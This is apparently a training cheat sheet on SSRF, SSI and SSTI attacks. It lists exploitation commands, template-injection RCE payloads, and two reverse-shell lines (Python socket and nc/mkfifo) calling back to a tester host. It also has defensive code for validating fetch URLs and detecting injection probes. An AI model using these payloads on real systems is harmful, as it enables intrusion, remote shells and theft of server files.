# Cheat sheet - server side attacks


The cheat sheet is a useful command reference for this module.

### Nginx Reverse Proxy & AJP

| **Command**                                                                                                                                 | **Description**                                                                          |
| ------------------------------------------------------------------------------------------------------------------------------------------- | ---------------------------------------------------------------------------------------- |
| `wget https://nginx.org/download/nginx-1.21.3.tar.gz`                                                                                       | Downloading nginx                                                                        |
| `tar -xzvf nginx-1.21.3.tar.gz`                                                                                                             | Extracting nginx tar file                                                                |
| `git clone https://github.com/dvershinin/nginx_ajp_module.git`                                                                              | Cloning nginx\_ajp source code                                                           |
| `cd nginx-1.21.3`                                                                                                                           | Navigating to nginx directory                                                            |
| `./configure --add-module=$(pwd)/../nginx_ajp_module --prefix=/etc/nginx --sbin-path=/usr/sbin/nginx --modules-path=/usr/lib/nginx/modules` | Setting up the configuration for building and installing Nginx web server                |
| `make`                                                                                                                                      | Compiling nginx together with the AJP module                                             |
| `sudo make install`                                                                                                                         | Running the Makefile's `install` target, which copies nginx into the paths given to `./configure` |
| `sudo nginx`                                                                                                                                | Starting the nginx server                                                                |

### SSRF Exploitation Example

| **Command**                                                                                                       | **Description**                                                                |
| ----------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------ |
| `nmap -sT -T5 --min-rate=10000 -p- 10.129.201.238`                                                                | Scanning the ports of the external target                                      |
| `curl -i -s -L http://<TARGET IP>`                                                                                | Interacting with the target and following redirects                            |
| `nc -lvnp 8080`                                                                                                   | Starting a netcat listener to test for SSRF                                    |
| `curl -i -s "http://<TARGET IP>/load?q=http://<VPN/TUN Adapter IP>:8080"`                                         | Testing for SSRF vulnerability                                                 |
| `python3 -m http.server 9090`                                                                                     | Starting the python web server                                                 |
| `sudo pip3 install twisted`                                                                                       | Installing Twisted, which provides the FTP server used in the next step        |
| `sudo python3 -m twisted ftp -p 21 -r .`                                                                          | Starting Twisted's FTP server on port 21, serving the current directory        |
| `curl -i -s "http://<TARGET IP>/load?q=http://<VPN/TUN Adapter IP>:9090/index.html"`                              | Retrieving a remote file through the target application (HTTP Schema)          |
| `curl -i -s "http://<TARGET IP>/load?q=file:///etc/passwd"`                                                       | Retrieving a local file through the target application (File Schema)           |
| `for port in {1..65535};do echo $port >> ports.txt;done`                                                          | Generating a wordlist of possible ports                                        |
| `ffuf -w ./ports.txt:PORT -u "http://<TARGET IP>/load?q=http://127.0.0.1:PORT" -fs 30`                            | Fuzzing for ports on the internal interface                                    |
| `curl -i -s "http://<TARGET IP>/load?q=http://127.0.0.1:5000"`                                                    | Interacting with the internal interface on the discovered port                 |
| `curl -i -s "http://<TARGET IP>/load?q=http://internal.app.local/load?q=index.html"`                              | Interacting with the internal application                                      |
| `curl -i -s "http://<TARGET IP>/load?q=http://internal.app.local/load?q=http://127.0.0.1:1"`                      | Discovering web application listening in on localhost                          |
| `curl -i -s "http://<TARGET IP>/load?q=http://internal.app.local/load?q=http::////127.0.0.1:1"`                   | Modifying the URL to bypass the error message                                  |
| `curl -i -s "http://<TARGET IP>/load?q=http://internal.app.local/load?q=file:://///proc/self/environ" -o -`       | Requesting to disclose the /proc/self/environ file on the internal application |
| `curl -i -s "http://<TARGET IP>/load?q=http://internal.app.local/load?q=file:://///app/internal_local.py"`        | Retrieving a local file through the target application                         |
| `curl -i -s "http://<TARGET IP>/load?q=http://internal.app.local/load?q=http::////127.0.0.1:5000/runme?x=whoami"` | Confirming remote code execution on the remote host                            |
| `sudo apt-get install jq`                                                                                         | Installing jq                                                                  |

### Blind SSRF Exploitation Example

| **Command**                                                                                                                                                                                                                        | **Description**                                  |
| ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------ |
| `nc -lvnp 9090`                                                                                                                                                                                                                    | Starting a netcat listener                       |
| `echo "<B64 encoded response>" \| base64 -d`                                                                                                                                                                                     | Decoding the base64-encoded response             |
| `export RHOST="<VPN/TUN IP>";export RPORT="<PORT>";python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'` | Reverse shell payload (to be URL-encoded twice)  |
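Both SSRF tables above exploit the same weakness: the `/load?q=` endpoint fetches whatever URL it is handed, so loopback, internal hostnames, `file://` and malformed `http::////` forms all reach the server side. The check below is an added defensive example, not code from this module or from any project it references; it shows how a fetch endpoint can validate a destination before connecting. The `ALLOWED_PORTS` set, the `FAKE_DNS` table and the hostnames in it (`cdn.example.test`, `rebind.example.test`, and so on) are constructed for the example.

```python
"""Destination validation for a URL-fetching endpoint (added example).

Rejects the destinations the SSRF walkthrough relies on: file:// and other
non-HTTP schemes, malformed "http::////" URLs (no host), loopback, private
and link-local addresses, unexpected ports, and hostnames that resolve to
internal space.
"""
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}

# Constructed DNS table so the example runs offline; system_resolve is the real one.
FAKE_DNS = {
    "cdn.example.test": ["93.184.216.34"],                  # sample public address
    "internal.app.local": ["10.0.0.5"],                     # internal-only hostname
    "metadata.example.test": ["169.254.169.254"],           # link-local metadata range
    "rebind.example.test": ["93.184.216.34", "127.0.0.1"],  # mixed public/loopback answers
}


def fake_resolve(host):
    """Offline stand-in for DNS; raises like socket.getaddrinfo on NXDOMAIN."""
    if host not in FAKE_DNS:
        raise socket.gaierror(f"constructed NXDOMAIN for {host}")
    return list(FAKE_DNS[host])


def system_resolve(host):
    """Resolve every A/AAAA record with the OS resolver."""
    infos = socket.getaddrinfo(host, None, proto=socket.IPPROTO_TCP)
    return sorted({info[4][0] for info in infos})


def is_public_address(ip_text):
    """True only for globally routable unicast addresses."""
    ip = ipaddress.ip_address(ip_text)
    # ::ffff:127.0.0.1 is loopback in disguise: apply the IPv4 rules to it.
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    if (ip.is_private or ip.is_loopback or ip.is_link_local or ip.is_multicast
            or ip.is_reserved or ip.is_unspecified):
        return False
    return ip.is_global


def check_fetch_url(url, resolve=system_resolve, allowed_hosts=None):
    """Return (allowed, reason, resolved_ips) for a user-supplied fetch URL.

    allowed_hosts: optional set of hostnames; when given, anything else is
    refused before DNS is consulted (default-deny is the stronger posture).
    """
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        return False, f"scheme not allowed: {parts.scheme!r}", []
    host = parts.hostname          # None for "http::////127.0.0.1:1": there is no netloc
    if not host:
        return False, "no host in URL", []
    try:
        port = parts.port or (443 if scheme == "https" else 80)
    except ValueError:
        return False, "invalid port", []
    if port not in ALLOWED_PORTS:
        return False, f"port not allowed: {port}", []
    if allowed_hosts is not None and host not in allowed_hosts:
        return False, f"host not on allowlist: {host}", []
    try:                           # literal address: check it directly
        ips = [str(ipaddress.ip_address(host))]
    except ValueError:             # hostname: check every address it resolves to
        try:
            ips = list(resolve(host))
        except OSError:
            return False, f"host does not resolve: {host}", []
    if not ips:
        return False, f"host does not resolve: {host}", []
    blocked = [ip for ip in ips if not is_public_address(ip)]
    if blocked:
        return False, f"resolves to non-public address: {', '.join(blocked)}", ips
    return True, "ok", ips


if __name__ == "__main__":
    for candidate in ("http://cdn.example.test/index.html", "file:///etc/passwd",
                      "http://127.0.0.1:5000", "http::////127.0.0.1:1",
                      "http://internal.app.local/load?q=index.html",
                      "http://rebind.example.test/"):
        print(candidate, "->", check_fetch_url(candidate, resolve=fake_resolve))
```

The check is applied to the resolved addresses rather than to the hostname string, which is why decimal or octal spellings of an address and names that resolve into internal space are all caught by the same rule. It does not by itself prevent DNS rebinding between the check and the connection: the HTTP client should connect to the addresses returned here (and refuse redirects, or re-run the check on each redirect target) rather than resolving the name a second time.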

### SSI Injection Exploitation Example

| **SSI Directive Payload**                                                                                   | **Description** |
| ----------------------------------------------------------------------------------------------------------- | --------------- |
| `<!--#echo var="DATE_LOCAL" -->`                                                                            | Date            |
| `<!--#printenv -->`                                                                                         | All variables   |
| `<!--#exec cmd="mkfifo /tmp/foo;nc <PENTESTER IP> <PORT> 0</tmp/foo\|/bin/bash 1>/tmp/foo;rm /tmp/foo" -->` | Reverse Shell   |

### SSTI Exploitation Example 1

| **Command**                                                                                              | **Description**                                                                                                    |
| -------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------ |
| `git clone https://github.com/epinna/tplmap.git`                                                         | Cloning the tplmap repository                                                                                      |
| `cd tplmap`                                                                                              | Navigating to the new directory                                                                                    |
| `pip install virtualenv`                                                                                 | Installing the virtual environment with pip                                                                        |
| `virtualenv -p python2 venv`                                                                             | Creating a virtual environment named venv with python2                                                             |
| `source venv/bin/activate`                                                                               | Activating a Python virtual environment, configuring the shell to use the virtual environment's Python interpreter |
| `pip install -r requirements.txt`                                                                        | Installing dependencies                                                                                            |
| `./tplmap.py -u 'http://<TARGET IP>:<PORT>' -d name=john`                                                | Running tplmap against the target                                                                                  |
| `./tplmap.py -u 'http://<TARGET IP>:<PORT>' -d name=john --os-shell`                                     | Running tplmap with the os-shell option                                                                            |
| `{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("id;uname -a;hostname")}}` | Twig RCE payload                                                                                                   |

### SSTI Exploitation Example 2

| **Command**                                                                                            | **Description**                                                      |
| ------------------------------------------------------------------------------------------------------ | -------------------------------------------------------------------- |
| `curl -X POST -d 'email=${7*7}' http://<TARGET IP>:<PORT>/jointheteam`                                 | Interacting with the remote target (Spring payload)                  |
| `curl -X POST -d 'email={{_self.env.display("TEST")}}' http://<TARGET IP>:<PORT>/jointheteam`          | Interacting with the remote target (Twig payload)                    |
| `curl -X POST -d 'email={{config.items()}}' http://<TARGET IP>:<PORT>/jointheteam`                     | Interacting with the remote target (Jinja2 basic injection)          |
| `curl -X POST -d 'email={{ [].class.base.subclasses() }}' http://<TARGET IP>:<PORT>/jointheteam`       | Interacting with the remote target (Jinja2 dump all classes payload) |
| `curl -X POST -d "email={% import os %}{{os.system('whoami')}}" http://<TARGET IP>:<PORT>/jointheteam` | Interacting with the remote target (Tornado payload)                 |
| `./tplmap.py -u 'http://<TARGET IP>:<PORT>/jointheteam' -d email=blah`                                 | Automating the exploitation process with tplmap                      |

### SSTI Exploitation Example 3

| **Command**                                                  | **Description**                                                     |
| ------------------------------------------------------------ | ------------------------------------------------------------------- |
| `curl -gs "http://<TARGET IP>:<PORT>/execute?cmd={{7*'7'}}"` | Interacting with the remote target (Confirming Jinja2 backend)      |
| `./tplmap.py -u 'http://<TARGET IP>:<PORT>/execute?cmd'`     | Automating the templating engine identification process with tplmap |
| `python3`                                                    | Starting the python3 interpreter                                    |

| **Methods**      | **Description**                                                                                                                     |
| ---------------- | ----------------------------------------------------------------------------------------------------------------------------------- |
| `__class__`      | Returns the class of which the object is an instance                                                                                |
| `__mro__`        | Returns a tuple of the classes in the method resolution order (the class itself, then its bases, ending in `object`); attribute lookup searches them in that order |
| `__subclasses__` | Every class keeps (weak) references to its direct subclasses; this method returns a list of those that are still alive              |
| `__builtins__`   | The dictionary of built-in names (functions and types) visible to a function                                                        |
| `__globals__`    | A reference to a dictionary that contains global variables for a function                                                           |
| `__base__`       | Returns the base class inherited by the object                                                                                      |
| `__init__`       | Class initialization method                                                                                                         |
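The SSI and SSTI tables above, and the attribute chain in the last table, all arrive as request parameters with a recognisable shape, which makes them straightforward to flag in access logs or in a request filter. The scanner below is an added detection example, not code from this module; it percent-decodes each parameter up to twice (the blind-SSRF table notes that payloads may be URL-encoded twice) and matches SSI directives, arithmetic template probes, Twig's `_self.env` chain, Tornado's `{% import %}`, Jinja2's `config` dump and the `__class__`/`__subclasses__` attribute walk. The signature names, the `SAMPLE_LOG` lines and the client addresses in them are constructed for the example.

```python
"""Detect SSI and SSTI probes in request parameters (added example).

Signatures follow the payload shapes in the cheat sheet tables; they are a
triage aid for logs and request filters, not a substitute for a sandboxed
template environment or for disabling SSI where it is not needed.
"""
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

SIGNATURES = [
    ("ssi_directive", re.compile(r"<!--\s*#\s*(exec|include|echo|printenv|config|set)\b", re.I)),
    ("ssti_arith_probe", re.compile(r"(\{\{|\$\{|\{%|<%=|#\{)\s*\d+\s*\*\s*'?\d+'?")),
    ("ssti_twig_self", re.compile(r"_self\.env\.")),
    ("ssti_tornado_import", re.compile(r"\{%\s*import\s+\w+\s*%\}")),
    ("ssti_jinja_config", re.compile(r"\{\{\s*config\b")),
    ("ssti_python_dunder", re.compile(r"__(class|mro|subclasses|builtins|globals|base|init)__")),
    ("ssti_class_walk", re.compile(r"\[\s*\]\s*\.\s*(__)?class(__)?\b")),
]

# Combined log format; only the fields the scanner uses are named.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Constructed access-log lines: three probes and one benign request.
SAMPLE_LOG = [
    '10.10.14.5 - - [12/Oct/2023:10:01:02 +0000] "GET /execute?cmd=%7B%7B7*%277%27%7D%7D HTTP/1.1" 200 17 "-" "curl/7.88.1"',
    '10.10.14.5 - - [12/Oct/2023:10:01:09 +0000] "GET /execute?cmd=%7B%7B%5B%5D.__class__.__base__.__subclasses__()%7D%7D HTTP/1.1" 200 4210 "-" "curl/7.88.1"',
    '10.10.14.5 - - [12/Oct/2023:10:02:30 +0000] "GET /page.shtml?name=%3C!--%23exec%20cmd%3D%22id%22%20--%3E HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [12/Oct/2023:10:03:00 +0000] "GET /execute?cmd=hello HTTP/1.1" 200 11 "-" "Mozilla/5.0"',
]


def decode_param(value, rounds=2):
    """Percent-decode repeatedly (bounded) so double-encoded payloads surface."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan_value(value):
    """Return the sorted signature names that match one parameter value."""
    text = decode_param(value)
    return sorted(name for name, pattern in SIGNATURES if pattern.search(text))


def scan_form_body(body):
    """Scan every field of an application/x-www-form-urlencoded body."""
    hits = set()
    for _, value in parse_qsl(body, keep_blank_values=True):
        hits.update(scan_value(value))
    return sorted(hits)


def scan_log_line(line):
    """Parse one combined-format line and scan its path and query parameters."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    # Scan the whole path and query as well as each value, so a payload that
    # contains '&' and is split by parse_qsl is still seen in one piece.
    hits = set(scan_value(parts.path)) | set(scan_value(parts.query))
    for _, value in parse_qsl(parts.query, keep_blank_values=True):
        hits.update(scan_value(value))
    return {"client": m.group("client"), "target": m.group("target"), "hits": sorted(hits)}


if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(scan_log_line(line))
```

Because access logs do not record POST bodies, `scan_form_body` is the hook to use from the application or a WAF for endpoints like `/jointheteam`; `scan_log_line` covers GET targets such as `/execute?cmd=`. The arithmetic-probe signature is deliberately broad (it matches `${7*7}`, `{{7*'7'}}`, `<%= 7*7 %>` and `#{7*7}`), since identifying the engine is the first step both tplmap and a manual tester take.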
